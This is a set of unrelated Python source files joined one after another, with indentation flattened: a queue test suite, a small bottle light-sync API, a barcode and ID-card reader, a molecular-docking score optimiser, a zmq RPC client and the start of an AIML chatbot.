def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
test_queue.py
|
import queue
import time
import unittest
from test import support
threading = support.import_module('threading')
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
class BlockingTestMixin:
def tearDown(self):
self.t = None
def do_blocking_test(self, block_func, block_args, trigger_func,
trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10)
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
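    # Hedged illustration (editor's addition) of the pattern above: block on
    # q.get() and let the trigger thread unblock it with q.put():
    #   result = self.do_blocking_test(q.get, (), q.put, ("item",))
    #   assert result == "item"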
def do_exceptional_blocking_test(self, block_func, block_args,
trigger_func, trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail('expected exception of kind %r' %
expected_exception_class)
finally:
self.t.join(10)
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail('trigger thread ended but event never set')
class BaseQueueTestMixin(BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if q.qsize():
raise RuntimeError('Call this function with an empty queue')
self.assertTrue(q.empty())
self.assertFalse(q.full())
q.put(111)
q.put(333)
q.put(222)
        target_order = dict(Queue=[111, 333, 222],
                            LifoQueue=[222, 333, 111],
                            PriorityQueue=[111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE - 1):
q.put(i)
self.assertTrue(q.qsize(), 'Queue should not be empty')
self.assertTrue(not qfull(q), 'Queue should not be full')
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), 'Queue should be full')
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except queue.Full:
pass
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except queue.Empty:
pass
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0, 1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
'q.join() did not block until all tasks were done')
for i in (0, 1):
q.put(-1)
q.join()
def test_queue_task_done(self):
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail('Did not detect task count going negative')
def test_queue_join(self):
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail('Did not detect task count going negative')
def test_simple_queue(self):
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2
with self.assertRaises(queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.Queue
class LifoQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.LifoQueue
class PriorityQueueTest(BaseQueueTestMixin, unittest.TestCase):
type2test = queue.PriorityQueue
class FailingQueueException(Exception):
pass
class FailingQueue(queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException('You Lose')
return queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException('You Lose')
return queue.Queue._get(self)
class FailingQueueTest(BlockingTestMixin, unittest.TestCase):
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError('Call this function with an empty queue')
for i in range(QUEUE_SIZE - 1):
q.put(i)
q.fail_next_put = True
try:
q.put('oops', block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put('oops', timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put('last')
self.assertTrue(qfull(q), 'Queue should be full')
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ('full',), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put('last')
q.fail_next_put = True
try:
            self.do_exceptional_blocking_test(
                q.put, ('full', True, 10), q.get, (), FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put('last')
self.assertTrue(qfull(q), 'Queue should be full')
q.get()
self.assertTrue(not qfull(q), 'Queue should not be full')
q.put('last')
self.assertTrue(qfull(q), 'Queue should be full')
self.do_blocking_test(q.put, ('full',), q.get, ())
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
q.put('first')
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), 'Queue should not be empty')
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), 'Queue should not be empty')
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), 'Queue should not be empty')
q.get()
self.assertTrue(not q.qsize(), 'Queue should be empty')
def test_failing_queue(self):
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
if __name__ == '__main__':
unittest.main()
|
run.py
|
import logging, json
from socket import timeout
from bottle import route, response, request, run
from mh_device import MagicHomeDevice
from workers import StoppableThread, sync_screen
sync_worker = StoppableThread(target=sync_screen, args=("light", 1))
@route('/api/state', method='GET')
def get_state():
status = "enabled" if sync_worker.is_alive() else "disabled"
message = { "status": status}
return json.dumps(message)
@route('/api/state', method='POST')
def set_state():
global sync_worker
data = json.loads(request.body.read())
message = { "status": "disabled" }
    if data['status'] and not sync_worker.is_alive():
light_ip = data['light_ip']
light_type = data['light_type']
polling_interval = data['polling_interval']
try:
logging.info("Attempting to connect to Magic Home device")
light = MagicHomeDevice(ipaddr=light_ip, setup=light_type)
logging.info("Starting sync worker thread")
sync_worker = StoppableThread(
target=sync_screen,
args=(light, polling_interval))
sync_worker.start()
message["status"] = "enabled"
except timeout:
            logging.warning("Could not connect to Magic Home device")
            response.status = 400
            message["error"] = "Could not connect to Magic Home device"
elif data['status'] is False and sync_worker.is_alive():
logging.info("Stopping sync worker thread")
sync_worker.stop()
sync_worker.join()
return json.dumps(message)
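# Hedged example (editor's addition) of a request that the handler above
# accepts; the IP, light type, and interval values are placeholders and must
# match whatever MagicHomeDevice expects:
#   curl -X POST http://localhost:6006/api/state \
#        -H 'Content-Type: application/json' \
#        -d '{"status": true, "light_ip": "192.168.1.50",
#             "light_type": "rgb", "polling_interval": 1}'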
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
try:
run(host='0.0.0.0', port=6006)
finally:
if sync_worker.is_alive():
sync_worker.stop()
sync_worker.join()
|
barcode_reader.py
|
import sys
import os
import json
import re
import threading
import lzstring
#import requests
import serial
from enum import Enum
from time import sleep
from datetime import datetime
from scripts.helpers import get_args, get_ports
from scripts.ymq import YPubNode
import base64
class Person:
def __init__(self, identification=None, name=None, last_name=None, gender=None, birth_date=None, blood_type=None,
extra_json=None, extra_txt=None, alert=None):
self.identification = identification
self.name = name
self.last_name = last_name
self.gender = gender
self.birth_date = birth_date
self.blood_type = blood_type
self.extra_json = extra_json
self.extra_txt = extra_txt
self.alert = alert
@staticmethod
def append_names(name1, name2):
names = [name1, name2]
return ' '.join(filter(None, names))
class BarcodeType(Enum):
QR = 0
CEDULA_COLOMBIA = 1
CEDULA_COSTA_RICA = 2
QR_DSD = 3
class BarcodeReader:
ports_allowlist = [44953]
KEYS_ARRAY_CR = [0x27, 0x30, 0x04, 0xA0, 0x00, 0x0F, 0x93, 0x12, 0xA0, 0xD1, 0x33, 0xE0, 0x03, 0xD0, 0x00, 0xDf,
0x00]
thread = None
initiated = False
args = None
def __init__(self, port=None, baudrate=115200, topic=""):
if port is None:
ports = get_ports()
for (com, desc, vid) in zip(ports[0], ports[1], ports[2]):
# print(com, desc, vid)
if vid in BarcodeReader.ports_allowlist:
port = com
if port is not None:
try:
self.serial = serial.Serial(port=port, baudrate=baudrate, timeout=0.5)
self.initiated = True
except Exception as e:
print(e)
self.args = get_args()
self.node = YPubNode(topic)
def __del__(self):
self.serial.close()
@staticmethod
def _decode_string_utf_8(values):
string_data = ''
for data in values:
if data != b'\x00':
string_data = string_data + data.decode('utf-8')
return string_data
@staticmethod
def _decode_string_iso_8859_1(values):
string_data = ''
for data in values:
if data != b'\x00':
string_data = string_data + data.decode('iso-8859-1')
return string_data
def get_reading(self):
if self.serial.in_waiting > 0:
msg = []
data_size = self.serial.in_waiting
for i in range(data_size):
value = self.serial.read()
msg.append(value)
# TODO improve code type detection to allow qr codes of length 531 and 700
if len(msg) == 531:
code_type = BarcodeType.CEDULA_COLOMBIA
elif len(msg) == 700:
code_type = BarcodeType.CEDULA_COSTA_RICA
else:
code_type = BarcodeType.QR
try:
data = None
if code_type == BarcodeType.CEDULA_COLOMBIA:
person = Person(
identification=self._decode_string_iso_8859_1(msg[48:58]).lstrip('0'),
name=Person.append_names(self._decode_string_iso_8859_1(msg[104:127]),
self._decode_string_iso_8859_1(msg[127:150])),
last_name=Person.append_names(self._decode_string_iso_8859_1(msg[58:81]),
self._decode_string_iso_8859_1(msg[81:104])),
gender=self._decode_string_iso_8859_1(msg[151:152]),
birth_date=self._decode_string_iso_8859_1(msg[152:156]) + '-' + self._decode_string_iso_8859_1(
msg[156:158]) + '-' + self._decode_string_iso_8859_1(msg[158:160]),
blood_type=self._decode_string_iso_8859_1(msg[166:169])
)
data = person.__dict__
elif code_type == BarcodeType.CEDULA_COSTA_RICA:
d = ""
j = 0
count = 0
for _value in msg:
if j == 17:
j = 0
# __value = int(_value)
c = self.KEYS_ARRAY_CR[j] ^ _value[0]
if re.match("^[a-zA-Z0-9]*$", chr(c)):
d = d + chr(c)
count = count + 1
else:
d += ' '
j = j + 1
person = Person(
identification=d[0:9].strip(),
name=d[61:91].strip(),
last_name=Person.append_names(d[9:35].strip(), d[35:61].strip()),
)
data = person.__dict__
elif code_type == BarcodeType.QR:
                    # This implementation expects QR codes containing JSON, encoded in base64
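                    # Illustrative payload only (values are made up; the "name" and
                    # "document" keys match the fields read below):
                    #   base64.b64encode(b'{"name": "Jane Doe", "document": "123456789"}')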
base64_data = (''.join(self._decode_string_iso_8859_1(msg)))
print(base64_data)
decoded_data = base64.b64decode(base64_data).decode('utf-8')
try:
msg_json = json.loads(decoded_data)
                    except Exception as e:
                        print("Error: not a valid JSON payload:", e)
                        return
person = Person(
name=msg_json["name"],
identification=msg_json["document"],
extra_txt=json.dumps(msg_json)
)
data = person.__dict__
if data is not None:
return {
'barcode_type': code_type.value,
'data': data,
'timestamp': datetime.now().isoformat()
}
except Exception as e:
print("Bardcode Error: ",e)
return
else:
sleep(0.1)
def _thread(self):
while True:
reading = self.get_reading()
if reading:
self.node.post(reading)
def start(self):
"""Start the background simulator thread if it isn't running yet."""
if self.thread is None:
# start background frame thread
self.thread = threading.Thread(target=self._thread)
self.thread.start()
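# --- Usage sketch (illustrative; not part of the original module) ---
# The topic name below is an assumption; the serial port is auto-detected
# from ports_allowlist by the constructor.
if __name__ == '__main__':
    reader = BarcodeReader(topic="barcode")
    if reader.initiated:
        reader.start()  # readings are published on the YPubNode topic
    else:
        print("No supported barcode scanner found")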
|
analyzeAll_customDir.py
|
import cPickle
import sys
import numpy
import glob
import gzip
import copy
import sys
import threading
import Queue
import time
ligands = []
allScoreList = []
allScoreListDict = {}
#scoreDict = {}
#resultsDir = '../dockingResults/'
#resultsDir = '../dockingResults_20140816shapes_peelDock_fullRadius_normed/'
resultsDir = sys.argv[1]
def loadPickle(this_q, this_filename):
filePrefix = this_filename.replace(resultsDir+'/','').replace('.cPickle','')
fo = gzip.open(this_filename,'rb')
#this_scoreList = cPickle.load(fo)
data = fo.read()
this_scoreList = cPickle.loads(data)
fo.close()
this_q.put((filePrefix, this_scoreList))
#this_scoreList2 = copy.deepcopy(this_scoreList)
#this_q.put((filePrefix, this_scoreList, this_scoreList2))
q = Queue.Queue()
threadList = []
for filename in glob.glob('%s/results*' %(resultsDir))[:30]:
#for filename in glob.glob('%s/results*' %(resultsDir))[:200]:
print filename
#filePrefix = filename.replace(resultsDir,'').replace('.cPickle','')
#ligands.append(filePrefix)
t = threading.Thread(target=loadPickle, args=(q,filename))
t.daemon = True
t.start()
threadList.append(t)
#fo = gzip.open(filename,'rb')
#scoreList = cPickle.load(fo)
#fo.close()
c = 0
while sum([i.is_alive() for i in threadList]) != 0:
time.sleep(1)
c += 1
print 'waiting for threads %i sec:' %(c), [i.is_alive() for i in threadList]
while not q.empty():
prefix, scoreList = q.get()
ligands.append(prefix)
#print scoreList
#scoreList = q.get()
#allScoreListDict[prefix] = copy.deepcopy(scoreList)
allScoreListDict[prefix] = scoreList
allScoreList = allScoreList + scoreList
#for entry in allScoreList:
# scoreDict[(tuple(entry[0]), tuple(entry[1]),filePrefix)] = entry[2]
#allScoreList = numpy.array(allScoreList)
rotations = {}
translations = {}
for ligand in ligands:
rotations[ligand] = set([])
translations[ligand] = set([])
for row in allScoreListDict[ligand]:
translations[ligand].add(tuple(row[0]))
rotations[ligand].add(tuple(row[1]))
#for translation, rotation, ligand in scoreDict.keys():
# translations[ligand].add(translation)
# rotations[ligand].add(rotation)
#for key in scoreDict.keys():
# translations.add(tuple(key[0]))
# rotations.add(tuple(key[1]))
minRotation = {}
for ligand in ligands:
#minRotation[ligand] = sorted(list(rotations[ligand]), key=lambda x:abs(x[0]))[0]
minRotation[ligand] = sorted(list(rotations[ligand]), key=lambda x:abs(x[0]))[-1]
print minRotation
##Get normalization factors
numTerms = len(allScoreList[0][2])
means = [0.0 for i in range(numTerms)]
for score in allScoreList:
for i in range(numTerms):
means[i] += abs(score[2][i]) / len(allScoreList)
means = numpy.array(means)
#Avoid dividing by 0
means[means==0.0] = 1.
ligandMeans = {}
for ligand in ligands:
ligandMeans[ligand] = [0.0 for i in range(numTerms)]
for score in allScoreListDict[ligand]:
for i in range(numTerms):
#print abs(score[2][i]) / len(allScoreListDict[ligand])
ligandMeans[ligand][i] += abs(score[2][i]) / len(allScoreListDict[ligand])
ligandMeans[ligand] = numpy.array(ligandMeans[ligand])
#Avoid dividing by 0
ligandMeans[ligand][ligandMeans[ligand] == 0.0] = 1.
print ligandMeans
###This comes in handy when scoring later
template_scoreListDict = {}
scoreTermsDict = {}
for ligand in ligands:
template_scoreListDict[ligand] = numpy.zeros((len(rotations[ligand])*len(translations[ligand]), 8))
template_scoreListDict[ligand][:,0:3] = numpy.array([[i[0][0], i[0][1], i[0][2]] for i in allScoreListDict[ligand]])
template_scoreListDict[ligand][:,3:7] = numpy.array([[i[1][0], i[1][1], i[1][2], i[1][3]] for i in allScoreListDict[ligand]])
scoreTermsDict[ligand] = numpy.array([i[2] for i in allScoreListDict[ligand]]) / ligandMeans[ligand]
#def computeScore(scoreList, factors):
# return sum([scoreList[i]*factors[i]/means[i] for i in range(len(scoreList))])
'''
def getBestTranslations(factors):
this_bestScoreTransDict= {}
for translation in translations:
transScores = []
bestScore = -99999999
bestRot = []
for rotation in rotations:
key = (translation, rotation)
if computeScore(scoreDict[key], factors) > bestScore:
bestRot = key[1]
bestScore = computeScore(scoreDict[key], factors)
this_bestScoreTransDict[(tuple(translation), tuple(bestRot))] = [scoreDict[(translation,bestRot)], factors]
this_bestScoreTransList = numpy.array([[key[0][0],
key[0][1],
key[0][2],
computeScore(scoreDict[key], factors)]
for key in this_bestScoreTransDict.keys()])
this_bestScoreTransList = numpy.array(sorted(this_bestScoreTransList, key=lambda x: x[3]))
return this_bestScoreTransList
'''
def scoreAll(factors):
# this_scoreListDict = {}
# for ligand in ligands:
# this_scoreListDict[ligand] = numpy.zeros((len(translations[ligand])*len(rotations[ligand]), 8))
# c=0
# for translation in translations[ligand]:
# for rotation in rotations[ligand]:
# this_scoreListDict[ligand][c] = numpy.array([translation[0], translation[1], translation[2], rotation[0], rotation[1], rotation[2], rotation[3], computeScore(scoreDict[(translation, rotation, ligand)], factors)])
# c += 1
# this_scoreListDict[ligand] = numpy.array(sorted(this_scoreListDict[ligand], key=lambda x:x[2]))
#this_scoreListDict = {}
this_scoreListDict = copy.deepcopy(template_scoreListDict)
for ligand in ligands:
#print len(rotations[ligand]), len(translations[ligand])
this_scoreListDict[ligand][:,7] = scoreTermsDict[ligand].dot(factors)
#, axis = 0, order = (7))
#this_scoreListDict[ligand] = numpy.array(sorted(this_scoreListDict[ligand], key=lambda x: x[7], reverse=True))
#print this_scoreListDict[ligand][:3]
return this_scoreListDict
def rankFactors(factors):
#This function takes a list of weighting factors and returns the rank that 0,0,0 gets when using them as multipliers on the score terms
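    #Illustrative call (hypothetical equal weights): rankFactors(numpy.ones(13))
    #sums, over all ligands, how many poses outscore the zero-translation
    #reference pose, so smaller return values indicate better weighting factors.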
#this_bestScoreTransList = getBestTranslations(factors)
print factors
this_scoreListDict = scoreAll(factors)
print 'scored!'
ranks = []
for ligand in ligands:
if 1:
a=this_scoreListDict[ligand]
#tripleZRows = numpy.logical_and(a[:,0]==0
tripleZScore = a[(a[:,0]==0) &
(a[:,1]==0) &
(a[:,2]==0) &
(a[:,3]==minRotation[ligand][0]) &
(a[:,4]==minRotation[ligand][1]) &
(a[:,5]==minRotation[ligand][2]) &
(a[:,6]==minRotation[ligand][3]),7]
rank = numpy.count_nonzero(this_scoreListDict[ligand][:,7]>tripleZScore)
ranks.append(rank)
else:
#this_scoreListDict[ligand] = this_scoreListDict[ligand][this_scoreListDict[ligand][:,7].argsort()][::-1]
for i, row in enumerate(this_scoreListDict[ligand]):
#print row
if row[0] == 0. and row[1] == 0. and row[2] == 0.:
if row[3] == minRotation[ligand][0] and row[4] == minRotation[ligand][1] and row[5] == minRotation[ligand][2] and row[6] == minRotation[ligand][3]:
#print row
#ranks.append(i)
tripleZScore = row[7]
rank = numpy.count_nonzero(this_scoreListDict[ligand][:,7]>tripleZScore)
ranks.append(rank)
break
print sum(ranks)
return sum(ranks)
#for i, row in enumerate(this_bestScoreTransList):
# if (row[:3] == numpy.array([0,0,0])).all():
# triple0 = i
#return -triple0
'''
def scoreFactors(factors):
#This function takes a list of weighting factors and returns a "score" that they get when using them as multipliers on the score terms
this_bestScoreTransList = getBestTranslations(factors)
runningScore = 0.0
for i, row in enumerate(this_bestScoreTransList):
#runningScore += (numpy.sqrt((row[0]**2) + (row[1]**2) + (row[2]**2))**8) * i
runningScore += (0.03 + -numpy.exp(-(numpy.sqrt((row[0]**2) + (row[1]**2) + (row[2]**2))**2)/2)) * i
#runningScore += (0.03 + -numpy.exp(-(numpy.sqrt((row[0]**2) + (row[1]**2) + (row[2]**2))**2)/5)) * row[3]
return runningScore
'''
def print_parameters(x):
print x
import scipy.optimize
###Just as a reminder
#my_score_functions =['hydrophobic_A * hydrophobic_B',
# 2 'hydrophilic_A * hydrophilic_B',
# 3 'hydrophilic_A * hydrophobic_B',
# 4 'hydrophobic_A * hydrophilic_B',
# 5 'hbondDonor_A * hbondAcceptor_B',
# 6 'hbondAcceptor_A * hbondDonor_B',
# 7 'hbondAcceptor_A * hbondAcceptor_B',
# 8 'hbondDonor_A * hbondDonor_B',
# 9 'aromatic_A * aromatic_B',
# 10 'occupancy_A * occupancy_B',
# 11 'adjacency_A * occupancy_B',
# 12 'occupancy_A * adjacency_B',
# 13 'adjacency_A * adjacency_B']
## Put in human-inputted factors
#user_factors = [5., 5., -5., -5., 5.,
# 5., 0., 0., 5., -15.,
# 5., 5., 0.]
user_factors = [0., 0., -0., -0., 0.,
0., 0., 0., 0., -00.,
0., 0., 0.]
my_optimization = scipy.optimize.minimize(rankFactors, #scoreFactors,
user_factors,
#method = 'COBYLA',
options={'disp':True,
#'factor':0.1},
#'m':100,
'eps': 2.},
#'rhobeg':1},
# 'pgtol':1},
#bounds = ((0,20),(0,20),(-10,10),
# (-10,10),(5,5),(5,5),
# (-10,10),(-10,10),(0,10),
# (-100,-10),(-20,20),(-20,20),
# (-20,20))
bounds = ((0,200),(0,200),(-100,100),
(-100,100),(0,100),(0,100),
(-100,100),(-100,100),(0,100),
(-500,-10),(-200,200),(-200,200),
(-200,200))
)
print 'OPTIMIZATION STATS:', my_optimization
optimizedFactors = my_optimization.x
'''
my_optimization = scipy.optimize.fmin(rankFactors,user_factors, xtol = 0.01)
optimizedFactors = my_optimization
'''
'''
optimizedFactors = numpy.array([ 6.27265804e-01, 4.54168056e+00, 5.46248338e+00, -1.87883923e+00, 1.44989168e+00, 3.79782140e-01, 5.51136641e-04, -2.47446270e-03, 1.14398554e+00, 2.64094296e-03, -2.12394170e-03, -2.48873856e-03, -9.11841469e-04, 7.13814468e-01, -1.06753076e+00, 2.37556547e+00, 1.97917698e+00, -2.62286481e+00])
'''
print 'OPTIMIZATION FINISHED!!!!!!'
print optimizedFactors
#bestScoreTransList = getBestTranslations(my_optimization.x)
#import matplotlib as mpl
#from mpl_toolkits.mplot3d import Axes3D
#import matplotlib.pyplot as plt
#fig = plt.figure(1)
#fig.clf()
#ax = Axes3D(fig)
#print bestScoreTransList
#p=ax.scatter(bestScoreTransList[:,0],bestScoreTransList[:,1],bestScoreTransList[:,2],c=bestScoreTransList[:,3])
#fig.colorbar(p)
#plt.show()
import pylab
finalScoreListDict = scoreAll(optimizedFactors)
finalScoreList = []
for key in finalScoreListDict:
finalScoreList.extend(finalScoreListDict[key])
#print finalScoreList
#distScoreList = numpy.array([[numpy.sqrt((i[0]**2)+(i[1]**2)+(i[2]**2)),i[7]] for i in finalScoreList])
#distScoreList = numpy.array([[numpy.sqrt((i[0]**2)+(i[1]**2)+(i[2]**2)) + (0.5*numpy.random.random())-0.25,i[7]] for i in finalScoreList])
distScoreList = numpy.array([[numpy.sqrt((i[0]**2)+(i[1]**2)+(i[2]**2)) + (1-abs(i[3])), i[7]] for i in finalScoreList])
pylab.scatter(distScoreList[:,0], distScoreList[:,1], color='black', s=3)
#for ligand in ligands:
for row in finalScoreList:
if row[0] == 0 and row[1] == 0 and row[2] == 0 and tuple(row[3:7]) in minRotation.values():
pylab.scatter([0],[row[7]], color='r', s=100)
h, xedges, yedges = numpy.histogram2d(distScoreList[:,0], distScoreList[:,1], bins=50)
pylab.imshow(h.T, extent=[xedges[0], xedges[-1], yedges[0], yedges[-1]],
interpolation = 'nearest',
aspect = 'auto',
origin = 'lower')
pylab.savefig('test.pdf')
pylab.show()
|
client.py
|
import threading
from datetime import datetime
from functools import lru_cache
from typing import Any
import zmq
from zmq.backend.cython.constants import NOBLOCK
from .common import HEARTBEAT_TOPIC, HEARTBEAT_TOLERANCE
class RemoteException(Exception):
"""
RPC remote exception
"""
def __init__(self, value: Any) -> None:
"""
Constructor
"""
self._value = value
def __str__(self) -> str:
"""
Output error message
"""
return self._value
class RpcClient:
""""""
def __init__(self) -> None:
"""Constructor"""
# zmq port related
self._context: zmq.Context = zmq.Context()
# Request socket (Request–reply pattern)
self._socket_req: zmq.Socket = self._context.socket(zmq.REQ)
# Subscribe socket (Publish–subscribe pattern)
self._socket_sub: zmq.Socket = self._context.socket(zmq.SUB)
        # Worker thread related, used to process data pushed from the server
self._active: bool = False # RpcClient status
self._thread: threading.Thread = None # RpcClient thread
self._lock: threading.Lock = threading.Lock()
self._last_received_ping: datetime = datetime.utcnow()
@lru_cache(100)
def __getattr__(self, name: str) -> Any:
"""
Realize remote call function
"""
# Perform remote call task
def dorpc(*args, **kwargs):
# Get timeout value from kwargs, default value is 30 seconds
if "timeout" in kwargs:
timeout = kwargs.pop("timeout")
else:
timeout = 30000
# Generate request
req: list = [name, args, kwargs]
# Send request and wait for response
with self._lock:
self._socket_req.send_pyobj(req)
# Timeout reached without any data
n: int = self._socket_req.poll(timeout)
if not n:
msg: str = f"Timeout of {timeout}ms reached for {req}"
raise RemoteException(msg)
rep = self._socket_req.recv_pyobj()
            # Return the response if successful; raise an exception if it failed
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
def start(
self,
req_address: str,
sub_address: str
) -> None:
"""
Start RpcClient
"""
if self._active:
return
# Connect zmq port
self._socket_req.connect(req_address)
self._socket_sub.connect(sub_address)
# Start RpcClient status
self._active = True
# Start RpcClient thread
self._thread = threading.Thread(target=self.run)
self._thread.start()
self._last_received_ping = datetime.utcnow()
def stop(self) -> None:
"""
Stop RpcClient
"""
if not self._active:
return
# Stop RpcClient status
self._active = False
def join(self) -> None:
# Wait for RpcClient thread to exit
if self._thread and self._thread.is_alive():
self._thread.join()
self._thread = None
def run(self) -> None:
"""
Run RpcClient function
"""
pull_tolerance: int = HEARTBEAT_TOLERANCE * 1000
while self._active:
if not self._socket_sub.poll(pull_tolerance):
self.on_disconnected()
continue
# Receive data from subscribe socket
topic, data = self._socket_sub.recv_pyobj(flags=NOBLOCK)
if topic == HEARTBEAT_TOPIC:
self._last_received_ping = data
else:
# Process data by callable function
self.callback(topic, data)
# Close socket
self._socket_req.close()
self._socket_sub.close()
def callback(self, topic: str, data: Any) -> None:
"""
Callable function
"""
raise NotImplementedError
def subscribe_topic(self, topic: str) -> None:
"""
Subscribe data
"""
self._socket_sub.setsockopt_string(zmq.SUBSCRIBE, topic)
def on_disconnected(self):
"""
Callback when heartbeat is lost.
"""
msg: str = f"RpcServer has no response over {HEARTBEAT_TOLERANCE} seconds, please check you connection."
print(msg)
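# --- Usage sketch (illustrative; addresses, topic and method name are assumptions) ---
if __name__ == "__main__":
    class PrintingRpcClient(RpcClient):
        def callback(self, topic: str, data: Any) -> None:
            print(f"received {topic}: {data}")

    rpc_client = PrintingRpcClient()
    rpc_client.subscribe_topic("")  # an empty prefix subscribes to every topic
    rpc_client.start("tcp://127.0.0.1:2014", "tcp://127.0.0.1:4102")
    # Remote calls are proxied through __getattr__, e.g.
    #   result = rpc_client.some_server_method(1, 2, timeout=5000)
    # and should be followed by rpc_client.stop(); rpc_client.join() on shutdown.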
|
core.py
|
import marshal
import os.path
import sys
import threading
import time
import traceback
import pyttsx
import re
import random
# Howie-specific
import aiml
import configFile
import frontends
from frontends import *
#import speech_recognition as sr
speech_engine = pyttsx.init('sapi5') # see http://pyttsx.readthedocs.org/en/latest/engine.html#pyttsx.init
speech_engine.setProperty('rate', 150)
class ActiveFrontEnd:
def __init__(self, inst, thread):
self._inst = inst
self._thread = thread
_frontends = {}
kernel = None
def _addFrontEnd(name, cls):
global _frontends
# verbose output
config = configFile.get()
if config['cla.verboseMode'] in ["yes", "y", "true"]:
print "Creating %s front-end using class %s" % (name, cls)
# Instantiate the frontend object
feInst = eval("%s.%s()" % (name, cls))
# Create a thread to run this frontend
feThread = threading.Thread(name=name, target=feInst.go)
feThread.setDaemon(True)
feThread.start()
_frontends[name] = ActiveFrontEnd(feInst, feThread)
def init():
    "Initialize the front-ends and back-ends."
    global kernel
# Fetch the configuration info
config = configFile.get()
# Initialize the AIML interpreter
print "Initializing AIML interpreter (please be patient)..."
kernel = aiml.Kernel()
#extract config options
try: verbose = config["general.verbose"] == "yes" or config["cla.verboseMode"] == "yes"
except: verbose = False
try: botName = config["general.botname"]
except: botName = "Nameless"
try: botMaster = config["general.botmaster"]
except: botMaster = "The Master"
try: sessionsPersist = config["general.sessionspersist"].lower() in ["yes", "y", "true"]
except: sessionsPersist = False
